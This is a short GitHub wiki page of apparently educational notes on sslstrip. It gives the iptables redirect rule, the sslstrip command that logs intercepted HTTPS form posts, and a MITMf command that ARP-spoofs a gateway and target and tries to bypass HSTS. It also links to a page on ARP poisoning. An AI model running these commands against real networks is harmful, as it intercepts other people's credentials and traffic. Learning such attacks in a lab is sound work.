Skip to content

sslstrip

Jump to bottom
Jennings Zhang edited this page Dec 8, 2017 · 5 revisions

https://tools.kali.org/information-gathering/sslstrip

sslstrip is a tool that transparently hijacks HTTP traffic on a network, watch for HTTPS links and redirects, and then map those links into look-alike HTTP links or homograph-similar HTTPS links.

sslstrip can fail against HSTS.

1. modify iptables.

iptables is used to configure the Linux firewall.

Set an inbound rule to forward TCP segments from port 80 (HTTP) to another port (one which sslstrip will listen on).

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT -–to-port 10000

2. Establish a MitM.

https://github.com/jennydaman/twlinux/wiki/Man-in-the-Middle-(MitM)-Attack-%E2%80%93-ARP-Poisoning

3. Exploit using sslstrip

sslstrip -w sslstrip.log -l 10000

POSTs over SSL/TLS will be written to sslstrip.log.

MitM Framework

We're on the forefront of the cyber-security arms-race.

sslstrip+ (sslstrip2) attempts to overcome HSTS. It is ineffective against updated browsers and systems.

mitmf -i eth0 --gateway 192.168.0.1 --arp --spoof --target 192.168.0.4 -k –-hsts

Based on

https://www.cybrary.it/0p3n/using-sslstrip-in-kali-linux/

https://twlinux.github.io/

Clone this wiki locally